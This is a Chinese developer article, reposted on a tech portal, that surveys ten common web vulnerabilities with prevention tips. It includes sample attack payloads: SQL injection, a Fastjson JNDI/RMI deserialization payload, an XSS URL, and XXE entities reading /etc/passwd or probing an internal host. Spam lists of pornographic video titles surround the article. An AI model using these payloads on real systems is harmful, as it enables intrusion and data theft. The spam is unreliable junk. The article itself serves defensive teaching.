精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

程序員必備基礎(chǔ):10種常見安全漏洞淺析

安全 漏洞
我們?nèi)粘i_發(fā)中,很多小伙伴容易忽視安全漏洞問題,認(rèn)為只要正常實現(xiàn)業(yè)務(wù)邏輯就可以了。其實,安全性才是最重要的。本文將跟大家一起學(xué)習(xí)常見的安全漏洞問題,希望對大家有幫助哈。

[[397390]]

前言

我們?nèi)粘i_發(fā)中,很多小伙伴容易忽視安全漏洞問題,認(rèn)為只要正常實現(xiàn)業(yè)務(wù)邏輯就可以了。其實,安全性才是最重要的。本文將跟大家一起學(xué)習(xí)常見的安全漏洞問題,希望對大家有幫助哈。如果本文有什么錯誤的話,希望大家提出哈,感謝感謝~

1. SQL 注入

1.1 什么是SQL注入?

SQL注入是一種代碼注入技術(shù),一般被應(yīng)用于攻擊web應(yīng)用程序。它通過在web應(yīng)用接口傳入一些特殊參數(shù)字符,來欺騙應(yīng)用服務(wù)器,執(zhí)行惡意的SQL命令,以達到非法獲取系統(tǒng)信息的目的。它目前是黑客對數(shù)據(jù)庫進行攻擊的最常用手段之一。

1.2 SQL注入是如何攻擊的?

舉個常見的業(yè)務(wù)場景:在web表單搜索框輸入員工名字,然后后臺查詢出對應(yīng)名字的員工。

這種場景下,一般都是前端頁面把一個名字參數(shù)name傳到后臺,然后后臺通過SQL把結(jié)果查詢出來

  1. name = "田螺"; //前端傳過來的 
  2.  
  3. SQL= "select * from staff where name=" + name;  //根據(jù)前端傳過來的name參數(shù),查詢數(shù)據(jù)庫員工表staff 

因為SQL是直接拼接的,如果我們完全信任前端傳的參數(shù)的話。假如前端傳這么一個參數(shù)時'' or '1'='1',SQL就變成醬紫的啦。

  1. select * from staff where name='' or '1'='1'

這個SQL會把所有的員工信息全都查出來了,醬紫請求用戶已經(jīng)越權(quán)啦。請求者可以獲取所有員工的信息,其他用戶信息已經(jīng)暴露了啦。

1.3 如何預(yù)防SQL注入問題

1.3.1 使用#{}而不是${}

在MyBatis中,使用#{}而不是${},可以很大程度防止sql注入。

  • 因為#{}是一個參數(shù)占位符,對于字符串類型,會自動加上"",其他類型不加。由于Mybatis采用預(yù)編譯,其后的參數(shù)不會再進行SQL編譯,所以一定程度上防止SQL注入。
  • ${}是一個簡單的字符串替換,字符串是什么,就會解析成什么,存在SQL注入風(fēng)險

1.3.2 不要暴露一些不必要的日志或者安全信息,比如避免直接響應(yīng)一些sql異常信息。

如果SQL發(fā)生異常了,不要把這些信息暴露響應(yīng)給用戶,可以自定義異常進行響應(yīng)

1.3.3 不相信任何外部輸入?yún)?shù),過濾參數(shù)中含有的一些數(shù)據(jù)庫關(guān)鍵詞關(guān)鍵詞

可以加個參數(shù)校驗過濾的方法,過濾union,or等數(shù)據(jù)庫關(guān)鍵詞

1.3.4 適當(dāng)?shù)臋?quán)限控制

在你查詢信息時,先校驗下當(dāng)前用戶是否有這個權(quán)限。比如說,實現(xiàn)代碼的時候,可以讓用戶多傳一個企業(yè)Id什么的,或者獲取當(dāng)前用戶的session信息等,在查詢前,先校驗一下當(dāng)前用戶是否是這個企業(yè)下的等等,是的話才有這個查詢員工的權(quán)限。

2. JSON反序列化漏洞——如Fastjson安全漏洞

2.1 什么是JSON序列化,JSON發(fā)序列化

  • 序列化:把對象轉(zhuǎn)換為字節(jié)序列的過程
  • 反序列:把字節(jié)序列恢復(fù)為Java對象的過程

Json序列化就是將對象轉(zhuǎn)換成Json格式的字符串,JSON反序列化就是Json串轉(zhuǎn)換成對象

2.2 JSON 反序列化漏洞是如何被攻擊?

不安全的反序列化可以導(dǎo)致遠(yuǎn)程代碼執(zhí)行、重放攻擊、注入攻擊或特權(quán)升級攻擊。之前Fastjson頻繁爆出安全漏洞,我們現(xiàn)在分析fastjson 1.2.24版本的一個反序列化漏洞吧,這個漏洞比較常見的利用手法就是通過jndi注入的方式實現(xiàn)RCE。

我們先來看fastjson一個反序列化的簡單例子:

  1. public class User { 
  2.     private String name
  3.  
  4.     private int age; 
  5.  
  6.     public String getName() { 
  7.         return name
  8.     } 
  9.  
  10.     public void setName(String name) { 
  11.         System.out.println("調(diào)用了name方法"); 
  12.         this.name = name
  13.     } 
  14.  
  15.     public int getAge() { 
  16.         return age; 
  17.     } 
  18.  
  19.     public void setAge(int age) { 
  20.         System.out.println("調(diào)用了age方法"); 
  21.         this.age = age; 
  22.     } 
  23.  
  24.     public static void main(String[] args) { 
  25.         String str = "{\"@type\":\"cn.eovie.bean.User\",\"age\":26,\"name\":\"撿田螺的小男孩\"}"
  26.         User user = JSON.parseObject(str,User.class); 
  27.     } 

運行結(jié)果:

  1. 調(diào)用了age方法 
  2. 調(diào)用了name方法 

加了@type屬性就能調(diào)用對應(yīng)對象的setXXX方法,而@type表示指定反序列化成某個類。如果我們能夠找到一個類,而這個類的某個setXXX方法中通過我們的精心構(gòu)造能夠完成命令執(zhí)行,即可達到攻擊的目的啦。

com.sun.rowset.JdbcRowSetImpl 就是類似這么一個類,它有兩個set方法,分別是setAutoCommit和setDataSourceName”

有興趣的小伙伴,可以看下它的源代碼

  1. public void setDataSourceName(String var1) throws SQLException { 
  2.       if (this.getDataSourceName() != null) { 
  3.           if (!this.getDataSourceName().equals(var1)) { 
  4.               super.setDataSourceName(var1); 
  5.               this.conn = null
  6.               this.ps = null
  7.               this.rs = null
  8.           } 
  9.       } else { 
  10.           super.setDataSourceName(var1); 
  11.       } 
  12.  
  13.   } 
  14.    
  15.     public void setAutoCommit(boolean var1) throws SQLException { 
  16.       if (this.conn != null) { 
  17.           this.conn.setAutoCommit(var1); 
  18.       } else { 
  19.           this.conn = this.connect(); 
  20.           this.conn.setAutoCommit(var1); 
  21.       } 
  22.  
  23.   } 
  24.    
  25.   private Connection connect() throws SQLException { 
  26.       if (this.conn != null) { 
  27.           return this.conn; 
  28.       } else if (this.getDataSourceName() != null) { 
  29.           try { 
  30.               InitialContext var1 = new InitialContext(); 
  31.               DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName()); 
  32.               return this.getUsername() != null && !this.getUsername().equals("") ? var2.getConnection(this.getUsername(), this.getPassword()) : var2.getConnection(); 
  33.           } catch (NamingException var3) { 
  34.               throw new SQLException(this.resBundle.handleGetObject("jdbcrowsetimpl.connect").toString()); 
  35.           } 
  36.       } else { 
  37.           return this.getUrl() != null ? DriverManager.getConnection(this.getUrl(), this.getUsername(), this.getPassword()) : null
  38.       } 
  39.   } 

setDataSourceName 簡單設(shè)置了設(shè)置了dataSourceName的值,setAutoCommit中有connect操作,connect方法中有典型的jndi的lookup方法調(diào)用,參數(shù)剛好就是在setDataSourceName中設(shè)置的dataSourceName。

因此,有漏洞的反序列代碼實現(xiàn)如下即可:

  1. public class FastjsonTest { 
  2.  
  3.     public static void main(String[] argv){ 
  4.         testJdbcRowSetImpl(); 
  5.     } 
  6.  
  7.     public static void testJdbcRowSetImpl(){ 
  8.         //JDK 8u121以后版本需要設(shè)置改系統(tǒng)變量 
  9.         System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase""true"); 
  10.         //RMI 
  11.         String payload2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:1099/Exploit\"," + 
  12.                 " \"autoCommit\":true}"
  13.         JSONObject.parseObject(payload2); 
  14.     } 

漏洞復(fù)現(xiàn)的流程如下哈:

參考的代碼來源這里哈,fastjson漏洞代碼測試(https://github.com/earayu/fastjson_jndi_poc)

如何解決json反序列化漏洞問題

可以升級版本,比如fastjson后面版本,增強AutoType打開時的安全性 fastjson,增加了AutoType黑名單等等,都是為了應(yīng)對這些安全漏洞。

反序列化有fastjson、gson、jackson等等類型,可以替換其他類型。

升級+打開safemode

3. XSS 攻擊

3.1 什么是XSS?

XSS 攻擊全稱跨站腳本攻擊(Cross-Site Scripting),這會與層疊樣式表(Cascading Style Sheets, CSS)的縮寫混淆,因此有人將跨站腳本攻擊縮寫為XSS。它指的是惡意攻擊者往Web頁面里插入惡意html代碼,當(dāng)用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執(zhí)行,從而達到惡意攻擊用戶的特殊目的。XSS攻擊一般分三種類型:存儲型 、反射型 、DOM型XSS”

3.2 XSS是如何攻擊的?

拿反射型舉個例子吧,流程圖如下:

我們搞點簡單代碼樣例吧,首先正常html頁面如下:

  1. <input type="text" name="name" /> 
  2. <input type="submit" value="搜索" onclick="http://127.0.0.1/search?name="
  3. </body> 

用戶輸入搜索信息,點擊搜索按鈕,就是到達正常服務(wù)器的。如果黑客在url后面的參數(shù)中加入如下的惡意攻擊代碼。

  1. http://127.0.0.1/search?keyword="<a href ="http://www.baidu.com"><script>alert('XSS');</script></a> 

當(dāng)用戶打開帶有惡意代碼的URL的時候,正常服務(wù)器會解析出請求參數(shù) name,得到"",拼接到 HTML 中返回給瀏覽器。形成了如下的 HTML:

用戶瀏覽器接收到響應(yīng)后執(zhí)行解析,其中的惡意代碼也會被執(zhí)行到。

4.這里的鏈接我寫的是百度搜索頁,實際上黑客攻擊的時候,是引誘用戶輸入某些重要信息,然后跳到他們自己的服務(wù)器,以竊取用戶提交的內(nèi)容信息。

3.3 如何解決XSS攻擊問題

  • 不相信用戶的輸入,對輸入進行過濾,過濾標(biāo)簽等,只允許合法值。
  • HTML 轉(zhuǎn)義

  • 對于鏈接跳轉(zhuǎn),如<a href="xxx" 等,要校驗內(nèi)容,禁止以script開頭的非法鏈接。
  • 限制輸入長度等等

4. CSRF 攻擊

4.1 什么是CSRF 攻擊?

CSRF,跨站請求偽造(英語:Cross-site request forgery),簡單點說就是,攻擊者盜用了你的身份,以你的名義發(fā)送惡意請求。跟跨網(wǎng)站腳本(XSS)相比,XSS 利用的是用戶對指定網(wǎng)站的信任,CSRF 利用的是網(wǎng)站對用戶網(wǎng)頁瀏覽器的信任。

4.2 CSRF是如何攻擊的呢?

我們來看下這個例子哈(來自百度百科)

  1. Tom 登陸銀行,沒有退出,瀏覽器包含了Tom在銀行的身份認(rèn)證信息。
  2. 黑客Jerry將偽造的轉(zhuǎn)賬請求,包含在在帖子
  3. Tom在銀行網(wǎng)站保持登陸的情況下,瀏覽帖子
  4. 將偽造的轉(zhuǎn)賬請求連同身份認(rèn)證信息,發(fā)送到銀行網(wǎng)站
  5. 銀行網(wǎng)站看到身份認(rèn)證信息,以為就是Tom的合法操作,最后造成Tom資金損失。

4.3 如何解決CSRF攻擊

檢查Referer字段。HTTP頭中有一個Referer字段,這個字段用以標(biāo)明請求來源于哪個地址。

添加校驗token。

5. 文件上傳下載漏洞

5.1 文件上傳漏洞

文件上傳漏洞是指用戶上傳了一個可執(zhí)行的腳本文件,并通過此腳本文件獲得了執(zhí)行服務(wù)器端命令的能力。常見場景是web服務(wù)器允許用戶上傳圖片或者普通文本文件保存,而用戶繞過上傳機制上傳惡意代碼并執(zhí)行從而控制服務(wù)器。”

解決辦法一般就是:

  • 限制服務(wù)器相關(guān)文件目錄的權(quán)限
  • 校驗上傳的文件,如后綴名 禁止上傳惡意代碼的文件
  • 盡量禁止使用前端上傳的文件名

5.2 文件下載漏洞

文件下載漏洞,舉個例子,使用 .. 等字符,使應(yīng)用讀取到指定目錄之外的其他目錄中的文件內(nèi)容,從而可能讀取到服務(wù)器的其他相關(guān)重要信息。

6. 敏感數(shù)據(jù)泄露

這個相對比較好理解,一般敏感信息包括密碼、用戶手機身份證信息、財務(wù)數(shù)據(jù)等等,由于web應(yīng)用或者API未加密或者疏忽保護,導(dǎo)致這些數(shù)據(jù)極易被黑客利用。所以我們需要保護好用戶的隱私數(shù)據(jù),比如用戶密碼加密保存,請求采用https加密,重要第三方接口采用加簽驗簽,服務(wù)端日志不打印敏感數(shù)據(jù)等等。

7. XXE 漏洞

7.1 什么是XXE

XXE就是XML外部實體注入。當(dāng)允許引用外部實體時,通過構(gòu)造惡意內(nèi)容,就可能導(dǎo)致任意文件讀取、系統(tǒng)命令執(zhí)行、內(nèi)網(wǎng)端口探測、攻擊內(nèi)網(wǎng)網(wǎng)站等危害。”

7.2 XXE三種攻擊場景

場景1. 攻擊者嘗試從服務(wù)端提取數(shù)據(jù)

  1. <?xml version="1.0"?> 
  2. <!DOCTYPE foo [ 
  3. <!ELEMENT foo (#ANY)> 
  4. <!ENTITY file SYSTEM "file:///etc/passwd">]> 
  5. ]> 
  6. <foo>&xxe;</foo> 

場景2. 攻擊者通過將上面的實體行更改為一下內(nèi)容來探測服務(wù)器的專用網(wǎng)絡(luò)

  1. <!ENTITY xxe SYSTEM "https://192.168.1.1/private">]> 

場景3. 攻擊者通過惡意文件執(zhí)行拒絕服務(wù)攻擊

  1. <!ENTITY xxe SYSTEM "file:///dev/random">]> 

7.3 如何防御XXE

  • 使用開發(fā)語言提供的禁用外部實體的方法
  • 過濾用戶提交的XML數(shù)據(jù),過濾

8. DDoS 攻擊

8.1 什么是DDos攻擊

DDoS 攻擊,英文全稱是 Distributed Denial of Service,谷歌翻譯過來就是“分布式拒絕服務(wù)”。一般來說是指攻擊者對目標(biāo)網(wǎng)站在較短的時間內(nèi)發(fā)起大量請求,大規(guī)模消耗目標(biāo)網(wǎng)站的主機資源,讓它無法正常服務(wù)。在線游戲、互聯(lián)網(wǎng)金融等領(lǐng)域是 DDoS 攻擊的高發(fā)行業(yè)。

為了方便理解,引用一下知乎上一個非常經(jīng)典的例子

我開了一家有五十個座位的重慶火鍋店,由于用料上等,童叟無欺。平時門庭若市,生意特別紅火,而對面二狗家的火鍋店卻無人問津。二狗為了對付我,想了一個辦法,叫了五十個人來我的火鍋店坐著卻不點菜,讓別的客人無法吃飯。”

8.2 如何應(yīng)對 DDoS 攻擊?

  • 高防服務(wù)器,即能獨立硬防御 50Gbps 以上的服務(wù)器,能夠幫助網(wǎng)站拒絕服務(wù)攻擊,定期掃描網(wǎng)絡(luò)主節(jié)點等
  • 黑名單
  • DDoS 清洗
  • CDN 加速

9. 框架或應(yīng)用漏洞

  • Struts 框架漏洞:遠(yuǎn)程命令執(zhí)行漏洞和開放重定向漏洞
  • QQ Browser 9.6:API 權(quán)限控制問題導(dǎo)致泄露隱私模式
  • Oracle GlassFish Server:REST CSRF
  • WebLogic: 未授權(quán)命令執(zhí)行漏洞
  • Hacking Docker:Registry API 未授權(quán)訪問
  • WordPress 4.7 / 4.7.1:REST API 內(nèi)容注入漏洞

10. 弱口令、證書有效性驗證、內(nèi)部接口在公網(wǎng)暴露、未鑒權(quán)等權(quán)限相關(guān)漏洞

10.1 弱口令

  • 空口令
  • 口令長度小于8
  • 口令不應(yīng)該為連續(xù)的某個字符(QQQQQQ)
  • 賬號密碼相同(例:root:root)
  • 口令與賬號相反(例:root:toor)
  • 口令純數(shù)字(例:112312324234, 電話號)
  • 口令純字母(例:asdjfhask)
  • 口令已數(shù)字代替字母(例:hello word, hell0 w0rd)
  • 口令采用連續(xù)性組合(例:123456,abcdef,654321,fedcba)
  • 服務(wù)/設(shè)備默認(rèn)出廠口令

10.2 證書有效性驗證漏洞

如果不對證書進行有效性驗證,那https就如同虛設(shè)啦。

  • 如果是客戶生成的證書,需要跟系統(tǒng)可信根CA形成信任鏈,不能為了解決ssl證書報錯的問題,選擇在客戶端代碼中信任客戶端中所有證書的方式。
  • 證書快過期時,需要提前更換。

10.3 未鑒權(quán)等權(quán)限相關(guān)漏洞

一些比較重要的接口,一般建議鑒權(quán)。比如你查詢某賬號的轉(zhuǎn)賬記錄,肯定需要先校驗該賬號是不是操作人旗下的啦。

參考與感謝

  • 【入坑JAVA安全】fastjson中的jndi注入
  • Web滲透之文件上傳漏洞總結(jié)
  • XXE漏洞利用技巧:從XML到遠(yuǎn)程代碼執(zhí)行
  • WEB應(yīng)用常見15種安全漏洞一覽
  • 什么是 DDoS 攻擊?
  • 弱口令總結(jié)(什么是弱口令)

本文轉(zhuǎn)載自微信公眾號「撿田螺的小男孩」,可以通過以下二維碼關(guān)注。轉(zhuǎn)載本文請聯(lián)系撿田螺的小男孩公眾號。

 

責(zé)任編輯:武曉燕 來源: 撿田螺的小男孩
相關(guān)推薦

2009-01-08 19:06:00

服務(wù)器安全Web服務(wù)器

2021-03-02 09:34:15

GitHub倉庫代碼

2020-05-09 11:20:02

Java結(jié)構(gòu)圖虛擬機

2020-01-12 19:10:30

Java程序員數(shù)據(jù)

2020-07-20 07:46:01

程序員加簽驗簽

2020-05-06 15:59:07

JavaScript程序員技術(shù)

2015-03-19 09:36:39

2024-01-09 09:19:31

2012-09-03 14:22:02

2011-09-28 09:31:18

2015-07-09 09:35:37

2009-06-25 09:33:43

Java API程序員

2018-06-27 10:07:28

2010-12-21 15:15:01

完美程序員

2011-08-29 17:05:55

2018-06-12 10:15:56

2019-03-26 15:57:17

智匯華云安全漏洞

2019-07-19 10:04:05

Java程序員Tomcat

2017-06-14 14:33:58

2020-04-20 19:00:30

程序員分布式事務(wù)架構(gòu)
點贊
收藏

51CTO技術(shù)棧公眾號

曰韩精品一区二区| 亚洲人体偷拍| 在线不卡免费av| bt天堂新版中文在线地址| www.麻豆av| 香蕉成人久久| 日韩在线观看你懂的| 亚洲三级在线视频| 欧美18—19sex性hd| 日韩毛片一二三区| 精品久久久久久中文字幕动漫 | 99久久99热这里只有精品| 日韩一区二区三区免费看 | 午夜69成人做爰视频| 老牛影视av一区二区在线观看| 色婷婷av久久久久久久| 成人在线免费观看网址| 青青草在线免费观看| 狠狠色综合日日| 日本欧美在线视频| 青青操国产视频| 日韩黄色大片| 亚洲欧美制服综合另类| 国产吃瓜黑料一区二区| 成人精品高清在线视频| 精品福利在线视频| 亚洲啊啊啊啊啊| 91在线视频| 久久精品亚洲精品国产欧美kt∨| 99视频日韩| 国产成人一二三区| 北京富婆泄欲对白| 亚洲男男av| 在线观看免费一区| 男人添女人下面高潮视频| 蜜桃视频在线观看免费视频网站www | 中文字幕中文乱码欧美一区二区| 韩国成人一区| 亚洲精品久久久久久久久久| 久88久久88久久久| 国产精品久久久久久久久久ktv| 精品少妇一二三区| 欧美在线1区| 久久精品成人一区二区三区| 黄色正能量网站| 美国成人xxx| 亚洲电影在线观看| 中文字幕在线观看视频www| 欧美xxxx性| 欧美日韩美少妇| 国产又大又黄又粗又爽| 嫩草伊人久久精品少妇av杨幂| 欧美日韩在线免费观看| 免费看国产一级片| 丁香高清在线观看完整电影视频 | 天堂8在线天堂资源bt| 青青影院在线观看| 中文字幕亚洲欧美在线不卡| 亚洲 日韩 国产第一区| 黄色视屏网站在线免费观看| 久久综合五月天婷婷伊人| 国产一区二区三区四区五区加勒比 | 久久久久九九九| 艳母动漫在线看| 2020国产精品| 日韩欧美三级一区二区| 小说区视频区图片区| 黄色av网址在线| av网站免费线看精品| 久久精品国产一区二区三区日韩| 免费观看毛片网站| 久久影音资源网| 天堂va久久久噜噜噜久久va| 日本在线免费播放| 一区二区欧美在线观看| 日韩小视频网站| 美脚恋feet久草欧美| 欧美性色aⅴ视频一区日韩精品| 午夜精品在线免费观看| 24小时成人在线视频| 欧美一二三四在线| 四季av综合网站| 蜜桃tv一区二区三区| 日韩在线免费高清视频| 欧美成人一二三区| 亚洲影视综合| 国产精品综合网站| www.香蕉视频| 久久夜色精品一区| 亚洲一二区在线| 日韩三级电影视频| 色噜噜夜夜夜综合网| 五月天激情播播| 国产成人精品福利| 国产午夜精品视频| 成人观看免费视频| 久久不射2019中文字幕| 国产视频福利一区| 亚洲 欧美 激情 另类| 国产精品日韩精品欧美在线| 欧美中文字幕在线观看视频| 天堂在线中文网官网| 欧美日韩aaaaa| 久久福利小视频| 91视频一区| 57pao精品| 国产毛片久久久久| 久久久久久麻豆| 国产亚洲精品久久久久久久| 精品网站在线| 99久久婷婷国产综合精品首页 | 伊人青青综合网站| 午夜写真片福利电影网| 久久婷婷一区| 国产91精品入口17c| 999国产在线视频| 婷婷久久综合九色国产成人 | 国产精品美女久久久久| 亚洲视频第一页| 国产一级黄色av| 久久99国内精品| 日本在线成人一区二区| 蜜桃在线视频| 精品免费视频.| 亚洲综合久久av一区二区三区| 亚洲一区二区三区高清不卡| 亚洲综合自拍一区| 日本在线看片免费人成视1000| 一本一道久久a久久精品综合蜜臀| 中国老熟女重囗味hdxx| 91嫩草亚洲精品| 国产精品久久久久久搜索| 男人天堂网在线观看| 香蕉成人啪国产精品视频综合网 | 亚洲18在线| 这里只有精品在线播放| 欧美一区二区三区不卡视频| 99免费精品视频| www.xxx麻豆| 亚洲精品在线国产| 另类色图亚洲色图| 一级黄色大片网站| 国产精品国产自产拍高清av王其 | 夜夜嗨av一区二区三区免费区| 日韩av男人天堂| 丁香激情综合国产| 天堂8在线天堂资源bt| 欧美专区视频| 欧美多人爱爱视频网站| 国产高中女学生第一次| 久久a爱视频| 日韩欧美在线网址| 给我免费观看片在线电影的| 激情成人亚洲| 精品国产一区二区三区久久久久久| 丁香花高清在线观看完整版| 精品国产91亚洲一区二区三区婷婷| 精品爆乳一区二区三区无码av| 国产精品一区二区在线观看不卡| 日韩一二区视频| 91精品短视频| 国语自产精品视频在线看抢先版图片 | 国产偷国产偷亚洲高清97cao| brazzers在线观看| 亚洲精品国产欧美| 中文字幕第四页| 国产亚洲一区二区在线观看| 无遮挡又爽又刺激的视频| 精品久久久久久久久久久下田| 国产精品日本精品| 国产成人无吗| 亚洲国产精彩中文乱码av在线播放| 久久久久久久99| 26uuu精品一区二区| 国产三级三级三级看三级| 国产99亚洲| 成人精品一区二区三区电影免费 | 亚洲一区二区三区四区五区黄| 在线观看亚洲免费视频| 香蕉久久夜色精品| 亚洲欧美在线网| 视频欧美一区| 欧美一级大片在线观看| 丁香在线视频| 精品国偷自产国产一区| 欧美 日韩 精品| 亚洲欧洲一区二区三区| 国产白袜脚足j棉袜在线观看| 国产精品五区| 精品久久免费观看| 欧美国产极品| 国产色综合天天综合网| 岛国av在线播放| 日韩最新中文字幕电影免费看| 国产高清在线免费| 欧美亚洲国产一区二区三区va| 精品无码国模私拍视频| 亚洲网站免费观看| 国产精品福利影院| 国产精品久久AV无码| 欧美aaa在线| 免费看黄在线看| 91影院成人| 蜜桃麻豆91| 日韩欧美一级| 国产精品在线看| 麻豆mv在线看| 欧美大片免费观看| 成人亚洲综合天堂| 日韩电影中文字幕av| 精品国产亚洲av麻豆| 在线看国产一区| 在线观看免费国产视频| 亚洲另类春色国产| 30一40一50老女人毛片| 国产盗摄女厕一区二区三区| 我要看一级黄色大片| 国产情侣一区| 美女黄色片网站| 精品久久精品| 欧美综合激情| 久久aimee| 国产精品久久亚洲| 国产日韩在线观看视频| 国产精品视频午夜| xxx欧美xxx| 欧美影院久久久| 色婷婷在线播放| 久久偷看各类女兵18女厕嘘嘘| 岛国在线大片| 一级做a爰片久久毛片美女图片| 四虎影视在线播放| 亚洲成人免费在线视频| 国内老熟妇对白hdxxxx| 在线成人小视频| 91欧美日韩麻豆精品| 欧美色网站导航| 糖心vlog精品一区二区| 色呦呦日韩精品| 五月天婷婷激情| 懂色av影视一区二区三区| 日韩三级视频在线| 香蕉影视欧美成人| www.国产成人| 欧美视频一区二区三区…| 日韩欧美亚洲一区二区三区| 性欧美疯狂xxxxbbbb| 五月婷婷激情网| 精品国产成人在线| 国产微拍精品一区| 色综合天天综合网天天狠天天| 欧美国产亚洲视频| 日本私人网站在线观看| 亚洲精品一区av在线播放| 视频国产在线观看| 亚洲日韩中文字幕| av网站在线免费播放| 日韩视频在线免费观看| 久久久久久国产精品免费无遮挡| 色妞在线综合亚洲欧美| 黄色免费在线看| 欧美大胆在线视频| 四虎影院观看视频在线观看| 欧美丰满少妇xxxx| free性护士videos欧美| 欧美一性一乱一交一视频| 精品视频一区二区三区四区五区| 国产精品一区二区三区毛片淫片 | 第一福利在线视频| 热久久这里只有| 99精品国自产在线| 97se视频在线观看| 欧美综合自拍| 日韩欧美一区二区视频在线播放| 99热国内精品永久免费观看| 国产一二三四区在线观看| 一区二区自拍| 粉嫩虎白女毛片人体| 久久国产生活片100| 久久国产免费视频| 久久女同互慰一区二区三区| 黄色免费一级视频| 一区二区三区在线观看欧美| 日韩美女黄色片| 91久久免费观看| 国产日本精品视频| 日韩av在线网址| 在线观看免费网站黄| 欧美劲爆第一页| 日韩高清不卡| 成人午夜电影免费在线观看| 久久不卡国产精品一区二区| 国产一二三四五| 欧美资源在线| 秋霞午夜鲁丝一区二区| 久久精品男人天堂av| 国产一区二区播放| 欧美日韩精品在线播放| 一区二区三区免费在线视频| 亚洲精品www久久久| 国产最新在线| 日本久久91av| 一区二区在线视频观看| 性高潮久久久久久久久| 国产欧美日韩综合一区在线播放 | 亚洲午夜无码久久久久| 精品久久久久久久久久久院品网 | 青青草成人影院| 男的插女的下面视频| 久久99精品久久久久久| 三级电影在线看| 一二三四区精品视频| 一级日韩一级欧美| 亚洲欧美国产视频| 成人女同在线观看| 91影视免费在线观看| 精品日产免费二区日产免费二区 | 蜜桃视频免费观看一区| 日本丰满少妇裸体自慰| 一区二区三区精品| 伊人网av在线| 亚洲欧洲午夜一线一品| 麻豆免费版在线观看| av在线不卡一区| 99久精品视频在线观看视频| 欧美黄色一级片视频| 99精品国产热久久91蜜凸| 久久婷婷国产麻豆91| 5566中文字幕一区二区电影| 懂色一区二区三区| 日韩免费高清在线观看| 全国精品免费看| 成人免费视频91| 国产成人免费视频精品含羞草妖精| 91视频最新网址| 欧美日韩一区二区三区在线看| 国产一级在线观看| 日本国产精品视频| 亚洲丝袜啪啪| 日本一本二本在线观看| 91麻豆精品一区二区三区| 韩国av免费观看| 精品av综合导航| 888av在线视频| 极品尤物一区二区三区| 99伊人成综合| 亚洲av无码一区二区二三区| 欧美视频一二三| 黄色片免费在线| 国产精品免费在线免费 | 精品国产一区二区三区无码| 处破女av一区二区| 国产在线视频在线观看| 亚洲国产欧美在线成人app| 9999在线视频| 裸模一区二区三区免费| 久久久久久网| 欧美大波大乳巨大乳| 欧美色手机在线观看| 幼a在线观看| 亚洲伊人一本大道中文字幕| 午夜精品av| 午夜视频在线观看国产| 一本到三区不卡视频| eeuss影院在线播放| 成人黄色激情网| 韩日精品视频| 爱爱的免费视频| 欧美性猛交xxxx黑人交 | 2019中文字幕在线| 免费成人av| 免费一区二区三区在线观看| 亚洲日穴在线视频| 老牛影视av牛牛影视av| 2019日本中文字幕| 日韩大片在线播放| 无套白嫩进入乌克兰美女| 午夜视频在线观看一区二区| 欧美伦理影视网| 国产日韩在线视频| 亚洲精品婷婷| 欧美日韩生活片| 欧美tk—视频vk| 桃子视频成人app| 777久久精品一区二区三区无码 | 精品国产污网站| 欧美极品免费| 男人草女人视频| 久久夜色精品国产噜噜av| 亚洲 小说区 图片区| 欧美激情极品视频| jlzzjlzz亚洲女人| 少妇伦子伦精品无吗| 欧美色视频在线观看| av剧情在线观看| 在线一区日本视频| 97久久精品人人爽人人爽蜜臀| 一炮成瘾1v1高h| 欧美专区在线观看| 欧美永久精品|